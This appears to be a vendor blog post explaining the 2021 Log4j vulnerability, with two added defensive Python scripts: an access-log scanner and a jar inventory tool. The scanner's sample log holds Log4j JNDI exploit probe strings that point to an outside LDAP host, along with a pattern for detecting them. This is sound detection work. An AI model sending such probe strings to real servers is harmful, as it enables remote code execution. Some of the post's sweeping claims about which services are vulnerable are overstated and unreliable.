Log4j has come up all over business and technology circles lately. What is it, and why is there a need to be concerned?
A series of critical flaws in widely used software has cybersecurity experts sounding alarms and major companies scrambling to fix the issues. On December 9, 2021, security researchers discovered a flaw in the code of a software library used for logging. More issues were discovered in the same code on the 11th.
It has been characterized by Tenable as “the single biggest, most critical vulnerability of the last decade.”
Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü. It is part of the Apache Logging Services, a project of the Apache Software Foundation.
The software library, Log4j, is built on a popular coding language, Java, that has widespread use in software and applications worldwide. This flaw in Log4j is estimated to be present in over 100 million instances globally. Cybersecurity firm Check Point says that over 100 hacking attempts per minute are currently seeking to exploit this flaw.
At the heart of the problem with Log4j is a confusion between simple data and executable commands.
Malicious coders have been exploiting this kind of confusion for as long as software has existed. Here it is layered deep in the very code your business is using, and you didn’t know it was there.
How does it work?
Log4j has three main components: loggers, appenders and layouts. These three types of components work together to enable developers to log messages according to message type and level, and to control at runtime how these messages are formatted and where they are reported.
Log4j is written in Java, which means it is completely device agnostic. It is also an open-source package. That means anybody (well, anybody with coding skills) can read the source code, spot any bugs, and contribute to improving the package.
The theory is that open-source code is safer because it has been examined by many sets of eyes, and because there is no possibility of a backdoor or some other unwanted feature hiding in the code. When the library involved is sensitive, involving encryption, it really does get serious scrutiny. But this simple log-writing module did not receive sufficient attention.
Here is a crucial point. Attacks using the vulnerability in Log4j are not aimed at consumers. A hacker who forces it to log a line of text that becomes a command is aiming to install malware on the hosting platform or a server (even at the cloud layer, servers are involved). Even containers are vulnerable. Microsoft reports that state-sponsored hackers are using it, likely to push ransomware. Apple, Cloudflare, Twitter, Valve, and other large companies have been affected. The Log4j flaw allows attackers to execute code remotely on a target computer, which could let them steal data, install malware, or take control. Exploits discovered recently include hacking systems to mine cryptocurrency. Other hackers have built malware to hijack computers for large-scale assaults on internet infrastructure, cyber researchers have found.
The vulnerability might give hackers enough of a foothold within a system to install ransomware, a type of computer virus that locks up data and systems until the attackers are paid by victims. Security company F-Secure said its analysts have observed some ransomware variants being deployed via the Log4j flaw, along with malware that is often deployed as a precursor to a ransomware strike.
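The attack described above starts with text a client controls (a request path, a header, a form field) being written to a log by Log4j, which then treats the text as a lookup instruction rather than as plain data. Because legitimate browsers and API clients never send Log4j lookup syntax, the presence of that syntax in a client-controlled field is itself a usable detection signal. The following is an added example, not code from the original article or from the Log4j project: it scans Apache-style access-log lines for lookup tokens in the request line, referer and user-agent, after undoing URL-encoding, and groups the hits by client address. The log lines, IP addresses and field layout are constructed for the example.

```python
import re
from urllib.parse import unquote

# Combined access-log layout assumed here (constructed for the example):
# client - - [timestamp] "request line" status size "referer" "user-agent"
ACCESS_LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j lookup syntax is "${...}".  A browser or API client has no reason to
# send it, so any occurrence in a client-controlled field is worth triage.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")

# Fields an outside party controls and that applications commonly log.
CLIENT_FIELDS = ("request", "referer", "ua")


def normalise(value):
    """Undo URL-encoding (twice, to cover double-encoded input) and lower-case."""
    decoded = value
    for _ in range(2):
        decoded = unquote(decoded)
    return decoded.lower()


def find_lookups(line):
    """Return [(field, token), ...] for every lookup token in one log line.

    Lines that do not match the expected layout yield no hits; report those
    separately rather than silently treating them as clean.
    """
    m = ACCESS_LINE_RE.match(line)
    if not m:
        return []
    hits = []
    for field in CLIENT_FIELDS:
        text = normalise(m.group(field))
        for token in LOOKUP_RE.findall(text):
            hits.append((field, token))
    return hits


def scan(lines):
    """Group lookup hits by client address: {client: [(field, token), ...]}."""
    report = {}
    for line in lines:
        hits = find_lookups(line)
        if hits:
            client = ACCESS_LINE_RE.match(line).group("client")
            report.setdefault(client, []).extend(hits)
    return report


# Constructed sample: two ordinary requests and two probes from one address,
# the second probe URL-encoded in the request path.  Addresses are RFC 5737
# documentation ranges.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" '
    '200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:10 +0000] '
    '"GET /%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fb%7D HTTP/1.1" '
    '404 0 "-" "curl/7.68.0"',
    '198.51.100.23 - - [10/Dec/2021:03:14:12 +0000] "POST /api/login HTTP/1.1" '
    '200 88 "https://shop.example/cart" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client)
        for field, token in hits:
            print(f"  {field}: {token}")
```

A hit here records an attempt, not a successful exploitation: whether the lookup was actually resolved depends on the Log4j version and configuration of the application that logged the line. The decoding step covers plain and double URL-encoding only; treat the script as a triage aid over the logs you already keep, alongside the vendor patch status checks the rest of the article describes.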
Reaction, and how widespread is Log4j?
“To be clear, this vulnerability poses a severe risk,” said Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency. “Internet-facing systems as well as back-end systems could contain the vulnerability.” CISA is a federal agency in the United States under the Department of Homeland Security.
CISA required US government branches to have all Log4j vulnerabilities resolved by Dec 24, 2021.
The FTC released a statement warning private companies to remediate Log4j or face consequences, citing the Equifax data breach as an example.
Belgium’s Defense Ministry said it shut down parts of its computer network because attackers triggered the vulnerability.
Internet content and asset company Akamai Technologies Inc. has tracked 10 million attempts to exploit the Log4j vulnerability per hour in the U.S. Hackers are using the vulnerability to target the retail sector more than any other, Akamai said. The technology, financial services and manufacturing industries have also been frequent targets.
Which technology suppliers are affected by the Log4j vulnerability?
Many, and the list is growing. Among them are Apple Inc., Amazon.com Inc., Cloudflare Inc., IBM, Microsoft’s Minecraft, Palo Alto Networks Inc., Twitter Inc., and many more.
In fact, if you use Software as a Service (SaaS) tools, Infrastructure as a Service, Platform as a Service, or any other hosted platform or service, you will be vulnerable to this exploit. This includes apps like Salesforce, Amazon Prime services and platforms, Intuit tax services, and the entire Adobe Creative Suite.
This vulnerability has the potential to be catastrophic, literally “breaking the internet,” because of the ease with which bad actors could exploit this flaw and undermine the platform hosting whatever applications they wish to attack, up to and including planting “backdoor” access while you are using your streamed applications.
So, what can be done?
Remember, you are responsible for your company’s business continuity and security. Hosts and providers do their due diligence, but it is up to you to ensure business continuity and disaster recovery.
As for protecting against Log4j on the corporate-owned infrastructure side, it is quite simple. There is a setting that controls whether the logging system can interpret data as code. Turning that switch off does the job. Naturally, Apache has released an update to the code module, but some researchers report that the only notable change in the update is that this switch defaults to off.
As noted, Log4j is code designed for hosted platforms, and the exploit attack affects servers. Still, your business may be affected if a hacker uses it to take down a platform or digital asset that is important to you, or tries to use the resource for drive-by downloads or other malware attacks.
For digital assets that you don’t own (such as SaaS and cloud platforms), you can protect against those attacks by performing due diligence: contact all your vendors to determine whether they are fully updated against this flaw.
CTO Dan Rasmussen offered a bash script on LinkedIn to help you inventory your servers and weed out the flaw. Another is available on GitHub.
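The inventory step the two scripts above are meant for can be done with a short program of your own. The following is an added example, not the article’s script, Dan Rasmussen’s, or any code from the Log4j project: it walks a directory tree, opens every .jar, .war and .ear file (descending into jars nested inside a WAR or EAR, where application servers usually keep them), recognises log4j-core by its package directory, reads the version from the standard Implementation-Version manifest attribute (falling back to the file name), and notes whether the JndiLookup class that performs the data-as-command lookup is present. The version threshold it reports as “patched” is an assumption written into the constant at the top; confirm it against the current Apache advisory before relying on it. The demo tree it builds is constructed for the example and contains stand-in archives, not real Log4j builds.

```python
import io
import os
import re
import tempfile
import zipfile

# Assumption: builds at or above this version are reported as "patched".
# Check the current Apache Log4j security advisory before relying on it.
MIN_PATCHED_VERSION = (2, 17, 1)
CORE_PACKAGE = "org/apache/logging/log4j/core/"
JNDI_LOOKUP_CLASS = CORE_PACKAGE + "lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
VERSION_RE = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); trailing non-numeric parts such as '-rc1' are dropped."""
    parts = []
    for piece in text.split("."):
        digits = re.match(r"\d+", piece)
        if not digits:
            break
        parts.append(int(digits.group()))
    return tuple(parts)


def classify(label, manifest, jndi_present):
    """Build one finding from the archive label, its manifest text and the JNDI flag."""
    m = VERSION_RE.search(manifest) or re.search(r"log4j-core-(\d+(?:\.\d+)+)", label)
    version = parse_version(m.group(1)) if m else None
    if version is None:
        status = "unknown-version"
    elif version >= MIN_PATCHED_VERSION:
        status = "patched"
    else:
        status = "needs-update"
    return {"path": label, "version": version,
            "jndi_lookup_present": jndi_present, "status": status}


def inspect_archive(fileobj, label):
    """Return findings for one jar/war/ear, descending into nested jars."""
    findings = []
    try:
        with zipfile.ZipFile(fileobj) as z:
            names = z.namelist()
            for n in names:  # e.g. WEB-INF/lib/log4j-core-*.jar inside a WAR
                if n.endswith(".jar"):
                    findings.extend(inspect_archive(io.BytesIO(z.read(n)), f"{label}!{n}"))
            if any(n.startswith(CORE_PACKAGE) for n in names):
                manifest = z.read(MANIFEST).decode("utf-8", "replace") if MANIFEST in names else ""
                findings.append(classify(label, manifest, JNDI_LOOKUP_CLASS in names))
    except zipfile.BadZipFile:
        pass  # not a zip archive despite its extension; skip it
    return findings


def scan_tree(root):
    """Walk a directory tree and report every log4j-core found in archives under it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh, path))
    return sorted(findings, key=lambda f: f["path"])


def _make_jar(target, version, core=True, jndi=True):
    """Constructed stand-in for a jar: a manifest plus empty class entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if core:
            z.writestr(CORE_PACKAGE + "Logger.class", b"")
            if jndi:
                z.writestr(JNDI_LOOKUP_CLASS, b"")
    data = buf.getvalue()
    if target is not None:
        with open(target, "wb") as fh:
            fh.write(data)
    return data


def build_demo_tree():
    """Temp tree (constructed): an old jar, a patched jar nested in a WAR, a non-log4j jar."""
    root = tempfile.mkdtemp(prefix="log4j-inv-")
    os.makedirs(os.path.join(root, "lib"))
    _make_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "2.14.1")
    _make_jar(os.path.join(root, "lib", "commons-io-2.11.0.jar"), "2.11.0", core=False)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _make_jar(None, "2.17.1"))
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for f in scan_tree(root):
        print(f"{f['status']:15} {f['version']} jndi={f['jndi_lookup_present']} {f['path']}")
```

Run it with a directory argument to scan a real server, or with no argument to see it work on the constructed demo tree. Two limits worth knowing: it looks only at archives on disk, so a Log4j copy loaded from an exploded class directory or shaded into another jar under a different package path will not be reported, and a “patched” result says nothing about the logging configuration or JVM flags the application actually runs with, which is the switch the previous paragraph describes.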
Do your part by having a business continuity plan, using multiple platforms, and taking frequent snapshots. Keeping your own data, devices, and connections secured means you are unlikely to be affected by the fallout from a Log4j exploit attack. If it does happen, you need a plan and process to continue business, and you may need to rebuild from your backed-up resources, so be sure to have the required components available to do so.
This is a confusing subject. It is a vulnerability located deep in code required for hosting services and applications to work. Your common end user typically does not get involved in this level of scrutiny. However, cloud-based services and hosting have changed the game. Many businesses run without a significant technology ownership presence or assistance. Yet all are vulnerable to the security challenge created by Log4j. You have questions, ConaLogix has answers. Let ConaLogix guide you through these business technology issues and challenges.